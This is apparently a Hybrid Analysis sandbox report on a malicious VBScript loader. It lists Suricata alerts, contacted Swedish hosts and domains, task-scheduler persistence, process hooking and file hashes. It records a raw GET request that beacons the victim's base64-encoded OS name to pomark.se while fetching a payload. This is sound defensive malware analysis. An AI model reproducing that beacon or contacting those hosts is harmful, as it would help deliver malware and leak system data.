MSG_156556.vbs
This report is generated from a file or URL submitted to this webservice on March 26th 2020 04:21:53 (UTC)
Guest System: Windows 7 64 bit, Professional, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v8.30 © Hybrid Analysis
Incident Response
Risk Assessment
- Remote Access: Contains a remote desktop related string
- Network Behavior: Contacts 2 domains and 2 hosts
MITRE ATT&CK™ Techniques Detection
Additional Context
Related Sandbox Artifacts
- Associated SHA256s
- 0172d9f9853e6221b7e700198e66343f835f0c331a3cb5be88a41c5bdc41fea5
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators (4)

External Systems

Detected Suricata Alert
- details: Detected alert "ETPRO MALWARE Unk.VBSLoader Retrieving Payload" (SID: 2841137, Rev: 1, Severity: 1) categorized as "A Network Trojan was detected" (PUA/PUP/Adware)
- source: Suricata Alerts
- relevance: 10/10

Sample was identified as malicious by at least one Antivirus engine
- details: 2/58 Antivirus vendors marked sample as malicious (3% detection rate)
- source: External System
- relevance: 8/10

Network Related

Malicious artifacts seen in the context of a contacted host
- details: Found malicious artifacts related to "93.188.2.54": ...
- source: Network Traffic
- relevance: 10/10

Hiding 1 malicious indicator

Suspicious Indicators (7)

Anti-Reverse Engineering

Possibly checks for known debuggers/analysis tools
- details: strings matched on indicator "ntice"; every match falls on an ordinary word such as "apprenticeship", "Prentice" or "enticer" inside the long runs of dictionary words that the obfuscated script carries as comments after its statements (matched strings omitted)
- source: File/Memory
- relevance: 2/10

External Systems

Detected Suricata Alert
- details: Detected alert "ET INFO TLS Handshake Failure" (SID: 2029340, Rev: 2, Severity: 2) categorized as "Potentially Bad Traffic"
- source: Suricata Alerts
- relevance: 10/10

Found an IP/URL artifact that was identified as malicious by at least one reputation engine
- details: 3/71 reputation engines marked "http://closed.loopia.com" as malicious (4% detection rate)
- source: External System
- relevance: 10/10

Installation/Persistence

Executes a Visual Basic script
- details: Process "wscript.exe" with commandline ""C:\MSG_156556.vbs""
- source: Monitored Target
- relevance: 10/10

Loads the task scheduler COM API
- details:
  - "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at FAD10000
  - "wscript.exe" loaded module "%WINDIR%\System32\taskschd.dll" at 028B0000
- source: Loaded Module
- relevance: 5/10
- ATT&CK ID: T1168 (Local Job Scheduling)

Network Related

Sends traffic on typical HTTP outbound port, but without HTTP header
- details:
  - TCP traffic to 93.188.2.54 on port 80 is sent without HTTP header
  - TCP traffic to 93.188.1.220 on port 443 is sent without HTTP header
- source: Network Traffic
- relevance: 5/10

Remote Access Related

Contains a remote desktop related string
- details:
  - "szlMoiacPqniUpvPvncBxoMPZc="65"" (Indicator for product: Generic VNC)
  - "szlMoiacPqniUpvPvncBxoMPZc=Asc(SHlkvIJmkakVytIZvcmD)" (Indicator for product: Generic VNC)
  - "kGmsDBaLhEIuvUMINhQVP=Fix(szlMoiacPqniUpvPvncBxoMPZc)" (Indicator for product: Generic VNC)
  - "szlMoiacPqniUpvPvncBxoMPZc=Sin(KFIRPoIyVGaElgNxwdVEmHujgw)" (Indicator for product: Generic VNC)
  - all four matches are on the substring "vnc" inside the randomly generated variable name szlMoiacPqniUpvPvncBxoMPZc, not on a VNC reference in the script's logic
- source: File/Memory
- relevance: 10/10

Informative (9)

General

Contacts domains
- details:
  - "pomark.se"
  - "closed.loopia.com"
- source: Network Traffic
- relevance: 1/10

Contacts server
- details:
  - "93.188.2.54:80"
  - "93.188.1.220:443"
- source: Network Traffic
- relevance: 1/10

Loads the .NET runtime environment
- details: "wscript.exe" loaded module "%WINDIR%\assembly\NativeImages_v2.0.50727_64\mscorlib\0478aed7fc25ae268474c704fd2a3e0f\mscorlib.ni.dll" at EC870000
- source: Loaded Module

Overview of unique CLSIDs touched in registry
- details:
  - "wscript.exe" touched "VB Script Language" (Path: "HKCU\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}")
  - "wscript.exe" touched "Constructor that allows hosts better control creating scriptlets" (Path: "HKCU\CLSID\{06290BD1-48AA-11D2-8432-006008C3FBFC}")
  - "wscript.exe" touched "XML DOM Document 3.0" (Path: "HKCR\SOFTWARE\CLASSES\CLSID\{F5078F32-C551-11D3-89B9-0000F81FE221}")
  - "wscript.exe" touched "ADODB.Stream" (Path: "HKCU\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}\TREATAS")
  - "wscript.exe" touched "Multi Language Support" (Path: "HKCU\CLSID\{275C23E2-3747-11D0-9FEA-00AA003F8646}\TREATAS")
  - "wscript.exe" touched "Windows Script Host Shell Object" (Path: "HKCU\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TREATAS")
  - "wscript.exe" touched "Server XML HTTP 6.0" (Path: "HKCU\CLSID\{88D96A0B-F192-11D4-A65F-0040963251E5}\TREATAS")
  - "wscript.exe" touched "WinHttpRequest Component version 5.1" (Path: "HKCU\CLSID\{2087C2F4-2CEF-4953-A8AB-66779B670495}\TREATAS")
  - "wscript.exe" touched "Wbem Scripting Object Path" (Path: "HKCU\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\TREATAS")
  - "wscript.exe" touched "WBEM Locator" (Path: "HKCU\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\TREATAS")
  - "wscript.exe" touched "WbemDefaultPathParser" (Path: "HKCU\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\TREATAS")
  - "wscript.exe" touched "Windows Management and Instrumentation" (Path: "HKCU\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\TREATAS")
  - "wscript.exe" touched "PSFactoryBuffer" (Path: "HKCU\CLSID\{7C857801-7381-11CF-884D-00AA004B2E24}\TREATAS")
  - "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IWbemServices" (Path: "HKCU\CLSID\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\TREATAS")
  - "wscript.exe" touched "Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject" (Path: "HKCU\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\TREATAS")
  - "wscript.exe" touched "System.Text.UnicodeEncoding" (Path: "HKCU\CLSID\{A0F5F5DC-337B-38D7-B1A3-FB1B95666BBF}\TREATAS")
  - "wscript.exe" touched "XML DOM Document" (Path: "HKCU\CLSID\{2933BF90-7B36-11D2-B20E-00C04F983E60}\TREATAS")
  - "wscript.exe" touched "TaskScheduler class" (Path: "HKCU\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TREATAS")
- source: Registry Access
- relevance: 3/10

Installation/Persistence

Touches files in the Windows directory
- details:
  - "wscript.exe" touched file "%WINDIR%\System32\en-US\wscript.exe.mui"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorwks.dll"
  - "wscript.exe" touched file "C:\Windows\System32\en-US\KernelBase.dll.mui"
  - "wscript.exe" touched file "C:\Windows\System32\msxml3r.dll"
  - "wscript.exe" touched file "C:\Windows\System32\wshom.ocx"
  - "wscript.exe" touched file "C:\Windows\System32\msxml6r.dll"
  - "wscript.exe" touched file "C:\Windows\System32\wbem\wbemdisp.tlb"
  - "wscript.exe" touched file "C:\Windows\System32\stdole2.tlb"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\clr.dll"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll"
  - "wscript.exe" touched file "C:\Windows\System32\WScript.exe.config"
  - "wscript.exe" touched file "C:\Windows\System32\wscript.exe"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CONFIG\machine.config"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch"
  - "wscript.exe" touched file "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config"
- source: API Call
- relevance: 7/10

Network Related

Found potential URL in binary/memory
- details:
  - Heuristic match: "pomark.se"
  - Heuristic match: "GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Accept-Language: en-us
    User-Agent: SonyHD
    Host: pomark.se"
  - Heuristic match: "closed.loopia.com"
- source: File/Memory
- relevance: 10/10

HTTP request contains Base64 encoded artifacts
- details: "Microsoft Windows 7 Professional " (the UTF-16LE string carried in the base64 uid parameter of the GET request above)
- source: Network Traffic
- relevance: 7/10
- ATT&CK ID: T1132 (Data Encoding)

Spyware/Information Retrieval

Found a reference to a known community page
- details: strings matched on indicator "twitter"; the matches fall on ordinary words such as "twitteration", "twitter-twatter" and "twittery" inside the dictionary-word comment padding of the obfuscated script (matched strings omitted)
- source: File/Memory
- relevance: 7/10

Unusual Characteristics

Installs hooks/patches the running process
- details: byte patches written by "wscript.exe" into the loaded modules SSPICLI.DLL, MSCORWKS.DLL and WS2_32.DLL (addresses and byte sequences omitted)
- source: Hook Detection
- relevance: 10/10
- ATT&CK ID: T1179 (Hooking)
File Details
MSG_156556.vbs
- Filename: MSG_156556.vbs
- Size: 973KiB (996733 bytes)
- Type: script vbs
- Description: ASCII text, with very long lines
- Architecture: WINDOWS
- SHA256: 84ee7aa75c401165805f6b4287899e3e927508a506dc06988d5635992353754f
- MD5: e5124cd58874cdf2709d3a06ae769d00
- SHA1: 4bb1f14e6578e17f3aa96d0254b41babef835d49
- ssdeep: 24576:31hCtebh6hmgwwnVPyWdq3hQL+XZFB2w8D+1:3nCMbh6hmgRVPp432qpFBxz
Hybrid Analysis
Analysed 1 process in total.
- wscript.exe "C:\MSG_156556.vbs" (PID: 2900)
Network Analysis
DNS Requests
Contacted Hosts
IP Address | Port/Protocol | Associated Process | Details |
---|---|---|---|
93.188.2.54 | 80 TCP | wscript.exe PID: 2900 | Sweden |
93.188.1.220 | 443 TCP | wscript.exe PID: 2900 | Sweden |
Contacted Countries
HTTP Traffic
Endpoint | Request | URL | Raw request |
---|---|---|---|
93.188.2.54:80 (pomark.se) | GET | pomark.se/staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA | GET /staple/444444.png?uid=TQBpAGMAcgBvAHMAbwBmAHQAIABXAGkAbgBkAG8AdwBzACAANwAgAFAAcgBvAGYAZQBzAHMAaQBvAG4AYQBsACAA HTTP/1.1; Connection: Keep-Alive; Accept: */*; Accept-Language: en-us; User-Agent: SonyHD; Host: pomark.se |
Suricata Alerts
Event | Category | Description | SID |
---|---|---|---|
93.188.1.220 -> local:49175 (TCP) | Potentially Bad Traffic | ET INFO TLS Handshake Failure | 2029340 |
local -> 93.188.2.54:80 (TCP) | A Network Trojan was detected | ETPRO MALWARE Unk.VBSLoader Retrieving Payload | 2841137 |
Extracted Strings
Extracted Files
No significant files were extracted.
Notifications
Runtime
- Although all strings were processed, some are hidden from the report in order to reduce the overall size
- Enforcing malicious verdict, as a reliable source indicates high confidence
- Not all Falcon MalQuery lookups completed in time
- Not all sources for indicator ID "api-55" are available in the report
- Not all sources for indicator ID "hooks-8" are available in the report